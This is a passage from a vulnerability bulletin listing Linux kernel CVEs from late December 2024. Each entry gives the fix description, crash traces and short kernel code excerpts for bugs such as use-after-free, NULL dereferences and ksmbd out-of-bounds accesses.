In the Linux kernel, the following vulnerability has been resolved: scsi: ufs: qcom: Only free platform MSIs when ESI is enabled Otherwise, it will result in a NULL pointer dereference as below: Unable to handle kernel NULL pointer dereference at virtual address 0000000000000008 Call trace: mutex_lock+0xc/0x54 platform_device_msi_free_irqs_all+0x14/0x20 ufs_qcom_remove+0x34/0x48 [ufs_qcom] platform_remove+0x28/0x44 device_remove+0x4c/0x80 device_release_driver_internal+0xd8/0x178 driver_detach+0x50/0x9c bus_remove_driver+0x6c/0xbc driver_unregister+0x30/0x60 platform_driver_unregister+0x14/0x20 ufs_qcom_pltform_exit+0x18/0xb94 [ufs_qcom] __arm64_sys_delete_module+0x180/0x260 invoke_syscall+0x44/0x100 el0_svc_common.constprop.0+0xc0/0xe0 do_el0_svc+0x1c/0x28 el0_svc+0x34/0xdc el0t_64_sync_handler+0xc0/0xc4 el0t_64_sync+0x190/0x194 | 2024-12-27 | not yet calculated | CVE-2024-56620 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: scsi: ufs: core: Cancel RTC work during ufshcd_remove() Currently, RTC work is only cancelled during __ufshcd_wl_suspend(). When ufshcd is removed in ufshcd_remove(), RTC work is not cancelled. Due to this, any further trigger of the RTC work after ufshcd_remove() would result in a NULL pointer dereference as below: Unable to handle kernel NULL pointer dereference at virtual address 00000000000002a4 Workqueue: events ufshcd_rtc_work Call trace: _raw_spin_lock_irqsave+0x34/0x8c pm_runtime_get_if_active+0x24/0xb4 ufshcd_rtc_work+0x124/0x19c process_scheduled_works+0x18c/0x2d8 worker_thread+0x144/0x280 kthread+0x11c/0x128 ret_from_fork+0x10/0x20 Since RTC work accesses the ufshcd internal structures, it should be cancelled when ufshcd is removed. So do that in ufshcd_remove(), as per the order in ufshcd_init(). | 2024-12-27 | not yet calculated | CVE-2024-56621 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: scsi: ufs: core: sysfs: Prevent div by zero Prevent a division by 0 when monitoring is not enabled. | 2024-12-27 | not yet calculated | CVE-2024-56622 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: scsi: qla2xxx: Fix use after free on unload System crash is observed with stack trace warning of use after free. There are 2 signals to tell dpc_thread to terminate (UNLOADING flag and kthread_stop). On setting the UNLOADING flag when dpc_thread happens to run at the time and sees the flag, this causes dpc_thread to exit and clean up itself. When kthread_stop is called for final cleanup, this causes use after free. Remove UNLOADING signal to terminate dpc_thread. Use the kthread_stop as the main signal to exit dpc_thread. [596663.812935] kernel BUG at mm/slub.c:294! [596663.812950] invalid opcode: 0000 [#1] SMP PTI [596663.812957] CPU: 13 PID: 1475935 Comm: rmmod Kdump: loaded Tainted: G IOE --------- - - 4.18.0-240.el8.x86_64 #1 [596663.812960] Hardware name: HP ProLiant DL380p Gen8, BIOS P70 08/20/2012 [596663.812974] RIP: 0010:__slab_free+0x17d/0x360 ... [596663.813008] Call Trace: [596663.813022] ? __dentry_kill+0x121/0x170 [596663.813030] ? _cond_resched+0x15/0x30 [596663.813034] ? _cond_resched+0x15/0x30 [596663.813039] ? wait_for_completion+0x35/0x190 [596663.813048] ? try_to_wake_up+0x63/0x540 [596663.813055] free_task+0x5a/0x60 [596663.813061] kthread_stop+0xf3/0x100 [596663.813103] qla2x00_remove_one+0x284/0x440 [qla2xxx] | 2024-12-27 | not yet calculated | CVE-2024-56623 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: iommufd: Fix out_fput in iommufd_fault_alloc() As fput() calls the file->f_op->release op, where fault obj and ictx are getting released, there is no need to release these two after fput() one more time, which would result in imbalanced refcounts: refcount_t: decrement hit 0; leaking memory. WARNING: CPU: 48 PID: 2369 at lib/refcount.c:31 refcount_warn_saturate+0x60/0x230 Call trace: refcount_warn_saturate+0x60/0x230 (P) refcount_warn_saturate+0x60/0x230 (L) iommufd_fault_fops_release+0x9c/0xe0 [iommufd] ... VFS: Close: file count is 0 (f_op=iommufd_fops [iommufd]) WARNING: CPU: 48 PID: 2369 at fs/open.c:1507 filp_flush+0x3c/0xf0 Call trace: filp_flush+0x3c/0xf0 (P) filp_flush+0x3c/0xf0 (L) __arm64_sys_close+0x34/0x98 ... imbalanced put on file reference count WARNING: CPU: 48 PID: 2369 at fs/file.c:74 __file_ref_put+0x100/0x138 Call trace: __file_ref_put+0x100/0x138 (P) __file_ref_put+0x100/0x138 (L) __fput_sync+0x4c/0xd0 Drop those two lines to fix the warnings above. | 2024-12-27 | not yet calculated | CVE-2024-56624 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: can: dev: can_set_termination(): allow sleeping GPIOs In commit 6e86a1543c37 ("can: dev: provide optional GPIO based termination support") GPIO based termination support was added. For no particular reason that patch uses gpiod_set_value() to set the GPIO. This leads to the following warning, if the systems uses a sleeping GPIO, i.e. behind an I2C port expander: | WARNING: CPU: 0 PID: 379 at /drivers/gpio/gpiolib.c:3496 gpiod_set_value+0x50/0x6c | CPU: 0 UID: 0 PID: 379 Comm: ip Not tainted 6.11.0-20241016-1 #1 823affae360cc91126e4d316d7a614a8bf86236c Replace gpiod_set_value() by gpiod_set_value_cansleep() to allow the use of sleeping GPIOs. | 2024-12-27 | not yet calculated | CVE-2024-56625 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix Out-of-Bounds Write in ksmbd_vfs_stream_write An offset from client could be a negative value, It could allows to write data outside the bounds of the allocated buffer. Note that this issue is coming when setting 'vfs objects = streams_xattr parameter' in ksmbd.conf. | 2024-12-27 | not yet calculated | CVE-2024-56626 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix Out-of-Bounds Read in ksmbd_vfs_stream_read An offset from client could be a negative value, It could lead to an out-of-bounds read from the stream_buf. Note that this issue is coming when setting 'vfs objects = streams_xattr parameter' in ksmbd.conf. | 2024-12-27 | not yet calculated | CVE-2024-56627 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: LoongArch: Add architecture specific huge_pte_clear() When executing mm selftests run_vmtests.sh, there is such an error: BUG: Bad page state in process uffd-unit-tests pfn:00000 page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x0 flags: 0xffff0000002000(reserved|node=0|zone=0|lastcpupid=0xffff) raw: 00ffff0000002000 ffffbf0000000008 ffffbf0000000008 0000000000000000 raw: 0000000000000000 0000000000000000 00000000ffffffff 0000000000000000 page dumped because: PAGE_FLAGS_CHECK_AT_FREE flag(s) set Modules linked in: snd_seq_dummy snd_seq snd_seq_device rfkill vfat fat virtio_balloon efi_pstore virtio_net pstore net_failover failover fuse nfnetlink virtio_scsi virtio_gpu virtio_dma_buf dm_multipath efivarfs CPU: 2 UID: 0 PID: 1913 Comm: uffd-unit-tests Not tainted 6.12.0 #184 Hardware name: QEMU QEMU Virtual Machine, BIOS unknown 2/2/2022 Stack : 900000047c8ac000 0000000000000000 9000000000223a7c 900000047c8ac000 900000047c8af690 900000047c8af698 0000000000000000 900000047c8af7d8 900000047c8af7d0 900000047c8af7d0 900000047c8af5b0 0000000000000001 0000000000000001 900000047c8af698 10b3c7d53da40d26 0000010000000000 0000000000000022 0000000fffffffff fffffffffe000000 ffff800000000000 000000000000002f 0000800000000000 000000017a6d4000 90000000028f8940 0000000000000000 0000000000000000 90000000025aa5e0 9000000002905000 0000000000000000 90000000028f8940 ffff800000000000 0000000000000000 0000000000000000 0000000000000000 9000000000223a94 000000012001839c 00000000000000b0 0000000000000004 0000000000000000 0000000000071c1d ... Call Trace: [<9000000000223a94>] show_stack+0x5c/0x180 [<9000000001c3fd64>] dump_stack_lvl+0x6c/0xa0 [<900000000056aa08>] bad_page+0x1a0/0x1f0 [<9000000000574978>] free_unref_folios+0xbf0/0xd20 [<90000000004e65cc>] folios_put_refs+0x1a4/0x2b8 [<9000000000599a0c>] free_pages_and_swap_cache+0x164/0x260 [<9000000000547698>] tlb_batch_pages_flush+0xa8/0x1c0 [<9000000000547f30>] tlb_finish_mmu+0xa8/0x218 [<9000000000543cb8>] exit_mmap+0x1a0/0x360 [<9000000000247658>] __mmput+0x78/0x200 [<900000000025583c>] do_exit+0x43c/0xde8 [<9000000000256490>] do_group_exit+0x68/0x110 [<9000000000256554>] sys_exit_group+0x1c/0x20 [<9000000001c413b4>] do_syscall+0x94/0x130 [<90000000002216d8>] handle_syscall+0xb8/0x158 Disabling lock debugging due to kernel taint BUG: non-zero pgtables_bytes on freeing mm: -16384 On LoongArch system, invalid huge pte entry should be invalid_pte_table or a single _PAGE_HUGE bit rather than a zero value. And it should be the same with invalid pmd entry, since pmd_none() is called by function free_pgd_range() and pmd_none() return 0 by huge_pte_clear(). So single _PAGE_HUGE bit is also treated as a valid pte table and free_pte_range() will be called in free_pmd_range(). free_pmd_range() pmd = pmd_offset(pud, addr); do { next = pmd_addr_end(addr, end); if (pmd_none_or_clear_bad(pmd)) continue; free_pte_range(tlb, pmd, addr); } while (pmd++, addr = next, addr != end); Here invalid_pte_table is used for both invalid huge pte entry and pmd entry. | 2024-12-27 | not yet calculated | CVE-2024-56628 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: HID: wacom: fix when get product name maybe null pointer Due to incorrect dev->product reporting by certain devices, null pointer dereferences occur when dev->product is empty, leading to potential system crashes. This issue was found on EXCELSIOR DL37-D05 device with Loongson-LS3A6000-7A2000-DL37 motherboard. Kernel logs: [ 56.470885] usb 4-3: new full-speed USB device number 4 using ohci-pci [ 56.671638] usb 4-3: string descriptor 0 read error: -22 [ 56.671644] usb 4-3: New USB device found, idVendor=056a, idProduct=0374, bcdDevice= 1.07 [ 56.671647] usb 4-3: New USB device strings: Mfr=1, Product=2, SerialNumber=3 [ 56.678839] hid-generic 0003:056A:0374.0004: hiddev0,hidraw3: USB HID v1.10 Device [HID 056a:0374] on usb-0000:00:05.0-3/input0 [ 56.697719] CPU 2 Unable to handle kernel paging request at virtual address 0000000000000000, era == 90000000066e35c8, ra == ffff800004f98a80 [ 56.697732] Oops[#1]: [ 56.697734] CPU: 2 PID: 2742 Comm: (udev-worker) Tainted: G OE 6.6.0-loong64-desktop #25.00.2000.015 [ 56.697737] Hardware name: Inspur CE520L2/C09901N000000000, BIOS 2.09.00 10/11/2024 [ 56.697739] pc 90000000066e35c8 ra ffff800004f98a80 tp 9000000125478000 sp 900000012547b8a0 [ 56.697741] a0 0000000000000000 a1 ffff800004818b28 a2 0000000000000000 a3 0000000000000000 [ 56.697743] a4 900000012547b8f0 a5 0000000000000000 a6 0000000000000000 a7 0000000000000000 [ 56.697745] t0 ffff800004818b2d t1 0000000000000000 t2 0000000000000003 t3 0000000000000005 [ 56.697747] t4 0000000000000000 t5 0000000000000000 t6 0000000000000000 t7 0000000000000000 [ 56.697748] t8 0000000000000000 u0 0000000000000000 s9 0000000000000000 s0 900000011aa48028 [ 56.697750] s1 0000000000000000 s2 0000000000000000 s3 ffff800004818e80 s4 ffff800004810000 [ 56.697751] s5 90000001000b98d0 s6 ffff800004811f88 s7 ffff800005470440 s8 0000000000000000 [ 56.697753] ra: ffff800004f98a80 wacom_update_name+0xe0/0x300 [wacom] [ 56.697802] ERA: 90000000066e35c8 strstr+0x28/0x120 [ 56.697806] CRMD: 000000b0 (PLV0 -IE -DA +PG DACF=CC DACM=CC -WE) [ 56.697816] PRMD: 0000000c (PPLV0 +PIE +PWE) [ 56.697821] EUEN: 00000000 (-FPE -SXE -ASXE -BTE) [ 56.697827] ECFG: 00071c1d (LIE=0,2-4,10-12 VS=7) [ 56.697831] ESTAT: 00010000 [PIL] (IS= ECode=1 EsubCode=0) [ 56.697835] BADV: 0000000000000000 [ 56.697836] PRID: 0014d000 (Loongson-64bit, Loongson-3A6000) [ 56.697838] Modules linked in: wacom(+) bnep bluetooth rfkill qrtr nls_iso8859_1 nls_cp437 snd_hda_codec_conexant snd_hda_codec_generic ledtrig_audio snd_hda_codec_hdmi snd_hda_intel snd_intel_dspcfg snd_hda_codec snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore input_leds mousedev led_class joydev deepin_netmonitor(OE) fuse nfnetlink dmi_sysfs ip_tables x_tables overlay amdgpu amdxcp drm_exec gpu_sched drm_buddy radeon drm_suballoc_helper i2c_algo_bit drm_ttm_helper r8169 ttm drm_display_helper spi_loongson_pci xhci_pci cec xhci_pci_renesas spi_loongson_core hid_generic realtek gpio_loongson_64bit [ 56.697887] Process (udev-worker) (pid: 2742, threadinfo=00000000aee0d8b4, task=00000000a9eff1f3) [ 56.697890] Stack : 0000000000000000 ffff800004817e00 0000000000000000 0000251c00000000 [ 56.697896] 0000000000000000 00000011fffffffd 0000000000000000 0000000000000000 [ 56.697901] 0000000000000000 1b67a968695184b9 0000000000000000 90000001000b98d0 [ 56.697906] 90000001000bb8d0 900000011aa48028 0000000000000000 ffff800004f9d74c [ 56.697911] 90000001000ba000 ffff800004f9ce58 0000000000000000 ffff800005470440 [ 56.697916] ffff800004811f88 90000001000b98d0 9000000100da2aa8 90000001000bb8d0 [ 56.697921] 0000000000000000 90000001000ba000 900000011aa48028 ffff800004f9d74c [ 56.697926] ffff8000054704e8 90000001000bb8b8 90000001000ba000 0000000000000000 [ 56.697931] 90000001000bb8d0 ---truncated--- | 2024-12-27 | not yet calculated | CVE-2024-56629 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: ocfs2: free inode when ocfs2_get_init_inode() fails syzbot is reporting busy inodes after unmount, for commit 9c89fe0af826 ("ocfs2: Handle error from dquot_initialize()") forgot to call iput() when new_inode() succeeded and dquot_initialize() failed. | 2024-12-27 | not yet calculated | CVE-2024-56630 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: scsi: sg: Fix slab-use-after-free read in sg_release() Fix a use-after-free bug in sg_release(), detected by syzbot with KASAN: BUG: KASAN: slab-use-after-free in lock_release+0x151/0xa30 kernel/locking/lockdep.c:5838 __mutex_unlock_slowpath+0xe2/0x750 kernel/locking/mutex.c:912 sg_release+0x1f4/0x2e0 drivers/scsi/sg.c:407 In sg_release(), the function kref_put(&sfp->f_ref, sg_remove_sfp) is called before releasing the open_rel_lock mutex. The kref_put() call may decrement the reference count of sfp to zero, triggering its cleanup through sg_remove_sfp(). This cleanup includes scheduling deferred work via sg_remove_sfp_usercontext(), which ultimately frees sfp. After kref_put(), sg_release() continues to unlock open_rel_lock and may reference sfp or sdp. If sfp has already been freed, this results in a slab-use-after-free error. Move the kref_put(&sfp->f_ref, sg_remove_sfp) call after unlocking the open_rel_lock mutex. This ensures: - No references to sfp or sdp occur after the reference count is decremented. - Cleanup functions such as sg_remove_sfp() and sg_remove_sfp_usercontext() can safely execute without impacting the mutex handling in sg_release(). The fix has been tested and validated by syzbot. This patch closes the bug reported at the following syzkaller link and ensures proper sequencing of resource cleanup and mutex operations, eliminating the risk of use-after-free errors in sg_release(). | 2024-12-27 | not yet calculated | CVE-2024-56631 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: nvme-tcp: fix the memleak while create new ctrl failed Now while we create new ctrl failed, we have not free the tagset occupied by admin_q, here try to fix it. | 2024-12-27 | not yet calculated | CVE-2024-56632 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: tcp_bpf: Fix the sk_mem_uncharge logic in tcp_bpf_sendmsg The current sk memory accounting logic in __SK_REDIRECT is pre-uncharging tosend bytes, which is either msg->sg.size or a smaller value apply_bytes. Potential problems with this strategy are as follows: - If the actual sent bytes are smaller than tosend, we need to charge some bytes back, as in line 487, which is okay but seems not clean. - When tosend is set to apply_bytes, as in line 417, and (ret < 0), we may miss uncharging (msg->sg.size - apply_bytes) bytes. [...] 415 tosend = msg->sg.size; 416 if (psock->apply_bytes && psock->apply_bytes < tosend) 417 tosend = psock->apply_bytes; [...] 443 sk_msg_return(sk, msg, tosend); 444 release_sock(sk); 446 origsize = msg->sg.size; 447 ret = tcp_bpf_sendmsg_redir(sk_redir, redir_ingress, 448 msg, tosend, flags); 449 sent = origsize - msg->sg.size; [...] 454 lock_sock(sk); 455 if (unlikely(ret < 0)) { 456 int free = sk_msg_free_nocharge(sk, msg); 458 if (!cork) 459 *copied -= free; 460 } [...] 487 if (eval == __SK_REDIRECT) 488 sk_mem_charge(sk, tosend - sent); [...] When running the selftest test_txmsg_redir_wait_sndmem with txmsg_apply, the following warning will be reported: ------------[ cut here ]------------ WARNING: CPU: 6 PID: 57 at net/ipv4/af_inet.c:156 inet_sock_destruct+0x190/0x1a0 Modules linked in: CPU: 6 UID: 0 PID: 57 Comm: kworker/6:0 Not tainted 6.12.0-rc1.bm.1-amd64+ #43 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014 Workqueue: events sk_psock_destroy RIP: 0010:inet_sock_destruct+0x190/0x1a0 RSP: 0018:ffffad0a8021fe08 EFLAGS: 00010206 RAX: 0000000000000011 RBX: ffff9aab4475b900 RCX: ffff9aab481a0800 RDX: 0000000000000303 RSI: 0000000000000011 RDI: ffff9aab4475b900 RBP: ffff9aab4475b990 R08: 0000000000000000 R09: ffff9aab40050ec0 R10: 0000000000000000 R11: ffff9aae6fdb1d01 R12: ffff9aab49c60400 R13: ffff9aab49c60598 R14: ffff9aab49c60598 R15: dead000000000100 FS: 0000000000000000(0000) GS:ffff9aae6fd80000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007ffec7e47bd8 CR3: 00000001a1a1c004 CR4: 0000000000770ef0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 PKRU: 55555554 Call Trace: <TASK> ? __warn+0x89/0x130 ? inet_sock_destruct+0x190/0x1a0 ? report_bug+0xfc/0x1e0 ? handle_bug+0x5c/0xa0 ? exc_invalid_op+0x17/0x70 ? asm_exc_invalid_op+0x1a/0x20 ? inet_sock_destruct+0x190/0x1a0 __sk_destruct+0x25/0x220 sk_psock_destroy+0x2b2/0x310 process_scheduled_works+0xa3/0x3e0 worker_thread+0x117/0x240 ? __pfx_worker_thread+0x10/0x10 kthread+0xcf/0x100 ? __pfx_kthread+0x10/0x10 ret_from_fork+0x31/0x40 ? __pfx_kthread+0x10/0x10 ret_from_fork_asm+0x1a/0x30 </TASK> ---[ end trace 0000000000000000 ]--- In __SK_REDIRECT, a more concise way is delaying the uncharging after sent bytes are finalized, and uncharge this value. When (ret < 0), we shall invoke sk_msg_free. Same thing happens in case __SK_DROP, when tosend is set to apply_bytes, we may miss uncharging (msg->sg.size - apply_bytes) bytes. The same warning will be reported in selftest. [...] 468 case __SK_DROP: 469 default: 470 sk_msg_free_partial(sk, msg, tosend); 471 sk_msg_apply_bytes(psock, tosend); 472 *copied -= (tosend + delta); 473 return -EACCES; [...] So instead of sk_msg_free_partial we can do sk_msg_free here. | 2024-12-27 | not yet calculated | CVE-2024-56633 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: gpio: grgpio: Add NULL check in grgpio_probe devm_kasprintf() can return a NULL pointer on failure,but this returned value in grgpio_probe is not checked. Add NULL check in grgpio_probe, to handle kernel NULL pointer dereference error. | 2024-12-27 | not yet calculated | CVE-2024-56634 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: net: avoid potential UAF in default_operstate() syzbot reported an UAF in default_operstate() [1] Issue is a race between device and netns dismantles. After calling __rtnl_unlock() from netdev_run_todo(), we can not assume the netns of each device is still alive. Make sure the device is not in NETREG_UNREGISTERED state, and add an ASSERT_RTNL() before the call to __dev_get_by_index(). We might move this ASSERT_RTNL() in __dev_get_by_index() in the future. [1] BUG: KASAN: slab-use-after-free in __dev_get_by_index+0x5d/0x110 net/core/dev.c:852 Read of size 8 at addr ffff888043eba1b0 by task syz.0.0/5339 CPU: 0 UID: 0 PID: 5339 Comm: syz.0.0 Not tainted 6.12.0-syzkaller-10296-gaaf20f870da0 #0 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014 Call Trace: <TASK> __dump_stack lib/dump_stack.c:94 [inline] dump_stack_lvl+0x241/0x360 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0x169/0x550 mm/kasan/report.c:489 kasan_report+0x143/0x180 mm/kasan/report.c:602 __dev_get_by_index+0x5d/0x110 net/core/dev.c:852 default_operstate net/core/link_watch.c:51 [inline] rfc2863_policy+0x224/0x300 net/core/link_watch.c:67 linkwatch_do_dev+0x3e/0x170 net/core/link_watch.c:170 netdev_run_todo+0x461/0x1000 net/core/dev.c:10894 rtnl_unlock net/core/rtnetlink.c:152 [inline] rtnl_net_unlock include/linux/rtnetlink.h:133 [inline] rtnl_dellink+0x760/0x8d0 net/core/rtnetlink.c:3520 rtnetlink_rcv_msg+0x791/0xcf0 net/core/rtnetlink.c:6911 netlink_rcv_skb+0x1e3/0x430 net/netlink/af_netlink.c:2541 netlink_unicast_kernel net/netlink/af_netlink.c:1321 [inline] netlink_unicast+0x7f6/0x990 net/netlink/af_netlink.c:1347 netlink_sendmsg+0x8e4/0xcb0 net/netlink/af_netlink.c:1891 sock_sendmsg_nosec net/socket.c:711 [inline] __sock_sendmsg+0x221/0x270 net/socket.c:726 ____sys_sendmsg+0x52a/0x7e0 net/socket.c:2583 ___sys_sendmsg net/socket.c:2637 [inline] __sys_sendmsg+0x269/0x350 net/socket.c:2669 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xf3/0x230 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f2a3cb80809 Code: ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 a8 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f2a3d9cd058 EFLAGS: 00000246 ORIG_RAX: 000000000000002e RAX: ffffffffffffffda RBX: 00007f2a3cd45fa0 RCX: 00007f2a3cb80809 RDX: 0000000000000000 RSI: 0000000020000000 RDI: 0000000000000008 RBP: 00007f2a3cbf393e R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000 R13: 0000000000000000 R14: 00007f2a3cd45fa0 R15: 00007ffd03bc65c8 </TASK> Allocated by task 5339: kasan_save_stack mm/kasan/common.c:47 [inline] kasan_save_track+0x3f/0x80 mm/kasan/common.c:68 poison_kmalloc_redzone mm/kasan/common.c:377 [inline] __kasan_kmalloc+0x98/0xb0 mm/kasan/common.c:394 kasan_kmalloc include/linux/kasan.h:260 [inline] __kmalloc_cache_noprof+0x243/0x390 mm/slub.c:4314 kmalloc_noprof include/linux/slab.h:901 [inline] kmalloc_array_noprof include/linux/slab.h:945 [inline] netdev_create_hash net/core/dev.c:11870 [inline] netdev_init+0x10c/0x250 net/core/dev.c:11890 ops_init+0x31e/0x590 net/core/net_namespace.c:138 setup_net+0x287/0x9e0 net/core/net_namespace.c:362 copy_net_ns+0x33f/0x570 net/core/net_namespace.c:500 create_new_namespaces+0x425/0x7b0 kernel/nsproxy.c:110 unshare_nsproxy_namespaces+0x124/0x180 kernel/nsproxy.c:228 ksys_unshare+0x57d/0xa70 kernel/fork.c:3314 __do_sys_unshare kernel/fork.c:3385 [inline] __se_sys_unshare kernel/fork.c:3383 [inline] __x64_sys_unshare+0x38/0x40 kernel/fork.c:3383 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xf3/0x230 arch/x8 ---truncated--- | 2024-12-27 | not yet calculated | CVE-2024-56635 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: geneve: do not assume mac header is set in geneve_xmit_skb() We should not assume mac header is set in output path. Use skb_eth_hdr() instead of eth_hdr() to fix the issue. sysbot reported the following : WARNING: CPU: 0 PID: 11635 at include/linux/skbuff.h:3052 skb_mac_header include/linux/skbuff.h:3052 [inline] WARNING: CPU: 0 PID: 11635 at include/linux/skbuff.h:3052 eth_hdr include/linux/if_ether.h:24 [inline] WARNING: CPU: 0 PID: 11635 at include/linux/skbuff.h:3052 geneve_xmit_skb drivers/net/geneve.c:898 [inline] WARNING: CPU: 0 PID: 11635 at include/linux/skbuff.h:3052 geneve_xmit+0x4c38/0x5730 drivers/net/geneve.c:1039 Modules linked in: CPU: 0 UID: 0 PID: 11635 Comm: syz.4.1423 Not tainted 6.12.0-syzkaller-10296-gaaf20f870da0 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 09/13/2024 RIP: 0010:skb_mac_header include/linux/skbuff.h:3052 [inline] RIP: 0010:eth_hdr include/linux/if_ether.h:24 [inline] RIP: 0010:geneve_xmit_skb drivers/net/geneve.c:898 [inline] RIP: 0010:geneve_xmit+0x4c38/0x5730 drivers/net/geneve.c:1039 Code: 21 c6 02 e9 35 d4 ff ff e8 a5 48 4c fb 90 0f 0b 90 e9 fd f5 ff ff e8 97 48 4c fb 90 0f 0b 90 e9 d8 f5 ff ff e8 89 48 4c fb 90 <0f> 0b 90 e9 41 e4 ff ff e8 7b 48 4c fb 90 0f 0b 90 e9 cd e7 ff ff RSP: 0018:ffffc90003b2f870 EFLAGS: 00010283 RAX: 000000000000037a RBX: 000000000000ffff RCX: ffffc9000dc3d000 RDX: 0000000000080000 RSI: ffffffff86428417 RDI: 0000000000000003 RBP: ffffc90003b2f9f0 R08: 0000000000000003 R09: 000000000000ffff R10: 000000000000ffff R11: 0000000000000002 R12: ffff88806603c000 R13: 0000000000000000 R14: ffff8880685b2780 R15: 0000000000000e23 FS: 00007fdc2deed6c0(0000) GS:ffff8880b8600000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000001b30a1dff8 CR3: 0000000056b8c000 CR4: 00000000003526f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> __netdev_start_xmit include/linux/netdevice.h:5002 [inline] netdev_start_xmit include/linux/netdevice.h:5011 [inline] __dev_direct_xmit+0x58a/0x720 net/core/dev.c:4490 dev_direct_xmit include/linux/netdevice.h:3181 [inline] packet_xmit+0x1e4/0x360 net/packet/af_packet.c:285 packet_snd net/packet/af_packet.c:3146 [inline] packet_sendmsg+0x2700/0x5660 net/packet/af_packet.c:3178 sock_sendmsg_nosec net/socket.c:711 [inline] __sock_sendmsg net/socket.c:726 [inline] __sys_sendto+0x488/0x4f0 net/socket.c:2197 __do_sys_sendto net/socket.c:2204 [inline] __se_sys_sendto net/socket.c:2200 [inline] __x64_sys_sendto+0xe0/0x1c0 net/socket.c:2200 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xcd/0x250 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f | 2024-12-27 | not yet calculated | CVE-2024-56636 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: netfilter: ipset: Hold module reference while requesting a module User space may unload ip_set.ko while it is itself requesting a set type backend module, leading to a kernel crash. The race condition may be provoked by inserting an mdelay() right after the nfnl_unlock() call. | 2024-12-27 | not yet calculated | CVE-2024-56637 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_inner: incorrect percpu area handling under softirq Softirq can interrupt ongoing packet from process context that is walking over the percpu area that contains inner header offsets. Disable bh and perform three checks before restoring the percpu inner header offsets to validate that the percpu area is valid for this skbuff: 1) If the NFT_PKTINFO_INNER_FULL flag is set on, then this skbuff has already been parsed before for inner header fetching to register. 2) Validate that the percpu area refers to this skbuff using the skbuff pointer as a cookie. If there is a cookie mismatch, then this skbuff needs to be parsed again. 3) Finally, validate if the percpu area refers to this tunnel type. Only after these three checks the percpu area is restored to a on-stack copy and bh is enabled again. After inner header fetching, the on-stack copy is stored back to the percpu area. | 2024-12-27 | not yet calculated | CVE-2024-56638 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: net: hsr: must allocate more bytes for RedBox support Blamed commit forgot to change hsr_init_skb() to allocate larger skb for RedBox case. Indeed, send_hsr_supervision_frame() will add two additional components (struct hsr_sup_tlv and struct hsr_sup_payload) syzbot reported the following crash: skbuff: skb_over_panic: text:ffffffff8afd4b0a len:34 put:6 head:ffff88802ad29e00 data:ffff88802ad29f22 tail:0x144 end:0x140 dev:gretap0 ------------[ cut here ]------------ kernel BUG at net/core/skbuff.c:206 ! Oops: invalid opcode: 0000 [#1] PREEMPT SMP KASAN NOPTI CPU: 2 UID: 0 PID: 7611 Comm: syz-executor Not tainted 6.12.0-syzkaller #0 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014 RIP: 0010:skb_panic+0x157/0x1d0 net/core/skbuff.c:206 Code: b6 04 01 84 c0 74 04 3c 03 7e 21 8b 4b 70 41 56 45 89 e8 48 c7 c7 a0 7d 9b 8c 41 57 56 48 89 ee 52 4c 89 e2 e8 9a 76 79 f8 90 <0f> 0b 4c 89 4c 24 10 48 89 54 24 08 48 89 34 24 e8 94 76 fb f8 4c RSP: 0018:ffffc90000858ab8 EFLAGS: 00010282 RAX: 0000000000000087 RBX: ffff8880598c08c0 RCX: ffffffff816d3e69 RDX: 0000000000000000 RSI: ffffffff816de786 RDI: 0000000000000005 RBP: ffffffff8c9b91c0 R08: 0000000000000005 R09: 0000000000000000 R10: 0000000000000302 R11: ffffffff961cc1d0 R12: ffffffff8afd4b0a R13: 